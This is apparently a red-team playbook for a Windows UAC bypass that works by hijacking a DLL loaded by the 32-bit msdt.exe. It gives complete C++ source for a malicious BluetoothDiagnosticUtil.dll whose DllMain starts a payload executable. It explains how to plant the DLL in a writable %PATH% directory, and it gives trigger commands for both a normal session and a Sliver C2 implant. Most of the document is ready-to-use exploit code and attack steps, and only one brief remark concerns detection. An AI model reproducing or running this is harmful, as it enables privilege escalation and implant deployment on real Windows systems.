UAC Bypass msdt.exe
1.0 Prerequisites
1.1 Compile DLL
NOTE
Before building, change the hard-coded application path (`C:\tmp\beacon1.exe` in the listing) to the payload you want launched, and build the DLL for x86 (32-bit): the target in section 2 is the SysWOW64 msdt.exe, which is a 32-bit process and cannot load a 64-bit DLL.
#include "pch.h"
#include <iostream>
#include <windows.h>
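// Starts the payload executable as a new process from inside the hijacked DLL.
//
// Parameters:
//   app_path  Absolute path of the image to run. It is passed to CreateProcessW
//             as lpApplicationName, so it must name the executable itself; no
//             command-line arguments are supplied. Defaults to the path the
//             page tells you to edit before building.
//
// Returns nothing. On success the process/thread handles are closed right away
// and the child keeps running on its own. On failure the Win32 error code is
// written to std::cerr - note that this is only visible when the host process
// has a console, which a DLL loaded by msdt.exe normally does not.
//
// NOTE(review): this is called from DllMain below, i.e. while the loader lock
// is held. CreateProcess is documented as unsafe to call from DllMain; the
// original takes that risk knowingly, so keep it in mind if the host hangs.
void executor(const wchar_t* app_path = L"C:\\tmp\\beacon1.exe")
{
    // Explicit W variants so the wide string literal compiles regardless of
    // whether UNICODE is defined for the project.
    STARTUPINFOW si = { sizeof(STARTUPINFOW) };
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL; // the original deliberately shows the child's window

    PROCESS_INFORMATION pi = {}; // zero-initialised: handles are never garbage on the failure path

    const BOOL started = CreateProcessW(
        app_path,            // lpApplicationName: the image to run
        nullptr,             // lpCommandLine: none
        nullptr,             // lpProcessAttributes: default SD, handle not inheritable
        nullptr,             // lpThreadAttributes: default SD, handle not inheritable
        FALSE,               // bInheritHandles
        CREATE_NEW_CONSOLE,  // give the child its own console window
        nullptr,             // lpEnvironment: inherit the parent's
        nullptr,             // lpCurrentDirectory: inherit the parent's
        &si,                 // STARTUPINFOW
        &pi);                // PROCESS_INFORMATION (out)

    if (!started)
    {
        // Read the error code before touching the stream: the stream's own
        // Win32 calls may overwrite the thread's last-error value.
        const DWORD err = GetLastError();
        // Original text said "cmd.exe", which is not what is launched.
        std::cerr << "Failed to start payload process. Error: " << err << '\n';
        return;
    }

    // We never wait on the child; drop our references so the handles do not
    // leak for the lifetime of the host process.
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
}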
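// DLL entry point. The only work happens on DLL_PROCESS_ATTACH, where the
// payload is launched via executor(); every other notification is ignored.
//
// Parameters:
//   hModule            Module handle of this DLL.
//   ul_reason_for_call Why the loader is calling us (DLL_PROCESS_ATTACH etc.).
//   lpReserved         Unused.
// Returns TRUE unconditionally so the loader never fails the load.
//
// NOTE(review): executor() calls CreateProcess, which Microsoft documents as
// unsafe while the loader lock is held. The original behaviour is preserved
// here; the change is that the attach case no longer falls through into the
// other labels (harmless before, but an easy place to introduce a bug later).
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID /*lpReserved*/
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Thread attach/detach notifications are never used, so opt out of them.
        DisableThreadLibraryCalls(hModule);
        executor();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    default:
        break;
    }
    return TRUE;
}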
1.2 Save to directory
Save the compiled DLL as BluetoothDiagnosticUtil.dll in a directory that is listed in the %PATH% variable and that your (unelevated) user can write to. Because %PATH% comes last in the Windows DLL search order, this only works if no DLL of that name exists in the directories searched before it (presumably the case for this target; verify on your build). Be aware that a write of BluetoothDiagnosticUtil.dll into a %PATH% directory, and msdt.exe loading a DLL from outside the Windows directory, are both easy detection points.
2.0 Attack
2.1 Run msdt.exe (from the standard, unelevated session; if the bypass applies, the DLL is loaded by the resulting msdt.exe process and the payload inherits its integrity level)
c:\windows\syswow64\msdt.exe -path C:\WINDOWS\diagnostics\index\BluetoothDiagnostic.xml -skip yes
2.2 Sliver equivalent (same command issued via the implant's execute command; the backslashes are doubled for the Sliver console's string parsing)
execute -o c:\\windows\\syswow64\\msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\BluetoothDiagnostic.xml -skip yes